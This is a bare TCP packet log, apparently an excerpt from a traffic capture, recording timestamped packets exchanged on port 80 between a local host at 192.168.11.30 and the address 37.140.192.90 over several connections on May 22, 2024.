                                                                        May 22, 2024 17:36:23.727025986 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727070093 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727233887 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.727376938 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727395058 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727657080 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.727718115 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727821112 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728055000 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.728130102 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728185892 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728338957 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.728511095 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728554964 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728754997 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728795052 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728796959 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.729008913 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:24.157619953 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.175451994 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.523999929 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.524285078 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.526063919 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.874783993 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902326107 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902354002 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902487993 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.902601004 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902751923 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902929068 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903001070 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903017044 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903228045 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903295040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903402090 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903580904 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903666019 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903703928 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903943062 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.251102924 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251118898 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251283884 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.251873016 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251970053 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251983881 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252065897 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252152920 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252367020 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252382040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252388000 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252557993 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252721071 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252825975 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252973080 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253051996 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253078938 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253402948 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253468990 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253506899 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253696918 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253712893 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253778934 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253839970 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253926992 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253942013 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254146099 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.254290104 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254342079 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254600048 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.599864006 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.599982977 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600104094 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600172997 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.600208998 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600410938 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.600598097 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600711107 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600882053 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600931883 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601018906 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601239920 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601413965 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601428986 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601609945 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601665020 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601680040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601907015 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601917028 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601931095 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602068901 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602124929 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602173090 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602375984 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602492094 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602504015 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602667093 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602866888 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602967978 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603179932 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.603180885 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603194952 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603456020 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.603657961 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603672028 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603858948 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:27.032048941 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.050241947 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.398461103 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.398639917 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.400497913 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.748851061 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.749119997 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.770644903 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.770659924 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.770884991 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.770900965 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.770915031 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771028042 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.771394014 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771409035 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771574020 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771604061 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.771684885 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771804094 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.771877050 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:28.771944046 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:28.772192955 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.119728088 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.119744062 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.119777918 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.119884968 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.119911909 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.120069027 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.120099068 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.120158911 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.120388031 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.120414972 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.120452881 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.120693922 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.120712996 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.120815039 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121073961 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121089935 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.121176958 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121386051 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121530056 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121599913 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.121710062 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.121792078 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.121812105 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.122189045 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.122222900 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.122237921 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.122473955 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.122488022 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.122489929 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.122751951 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.468269110 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.468377113 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.468519926 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.468534946 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.468627930 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.468795061 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.468959093 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.468974113 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469120979 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.469172955 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469295025 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469480991 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.469604015 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469619989 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469821930 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.469837904 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.469963074 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470108032 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.470269918 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470285892 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470561028 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.470618010 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470741987 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470854998 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470868111 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.470875025 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.471049070 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.471232891 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.471321106 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.471460104 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.471482038 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.471579075 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.471734047 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.471760988 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.471774101 CEST804985237.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:29.472002983 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:29.906392097 CEST4985280192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:30.924812078 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.274704933 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.274909019 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.276565075 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.629312992 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.646790028 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.646895885 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.647104979 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.647109985 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.647229910 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.647337914 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.647706032 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.647722006 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.647871971 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.647938967 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.648061037 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.648217916 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.648340940 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.648385048 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.648518085 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.996215105 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.996231079 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.996407986 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.996788979 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.996813059 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.997019053 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.997396946 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.997416019 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.997656107 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.997880936 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.997895956 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.998094082 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.998442888 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.998457909 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.998701096 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.999043941 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.999090910 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.999280930 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:31.999599934 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.999649048 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:31.999852896 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.000087976 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.000161886 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.000343084 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.000684023 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.000802040 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.000989914 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.001312971 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.001363039 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.001573086 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.345500946 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.345519066 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.345736980 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.346000910 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.346015930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.346259117 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.346628904 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.346643925 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.346803904 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.347168922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.347182989 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.347346067 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.347748041 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.347877979 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.348052979 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.348264933 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.348381042 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.348572016 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.348917961 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.348932981 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.349123955 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.349468946 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.349484921 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.349625111 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.350105047 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.350152969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.350339890 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.350586891 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.350677013 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.350898981 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.351119995 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.351213932 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.351413965 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.351732969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.351789951 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.351952076 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.352324963 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.352435112 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.352690935 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.352901936 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.352984905 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.353213072 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.353394032 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.353513002 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.353847980 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.353918076 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.353960991 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.354208946 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.354263067 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.354314089 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.354564905 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.354684114 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.354707003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.354990005 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.355016947 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.355065107 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.355258942 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.355281115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.355329990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.355514050 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.694972038 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.694988966 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.695236921 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.695667028 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.695693970 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.695852041 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.696247101 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.696278095 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.696456909 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.696887016 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.696902037 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.697057009 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.697494030 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.697509050 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.697654963 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.698081970 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.698097944 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.698266029 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.698657990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.698673010 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.699098110 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.699227095 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.699239969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.699511051 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.699856997 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.699870110 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.700150967 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.700558901 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.700586081 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.700722933 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.701081991 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.701095104 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.701265097 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.701708078 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.701807022 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.702061892 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.702276945 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.702367067 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.702620983 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.702943087 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.703048944 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.703356028 CEST4985380192.168.11.3037.140.192.90
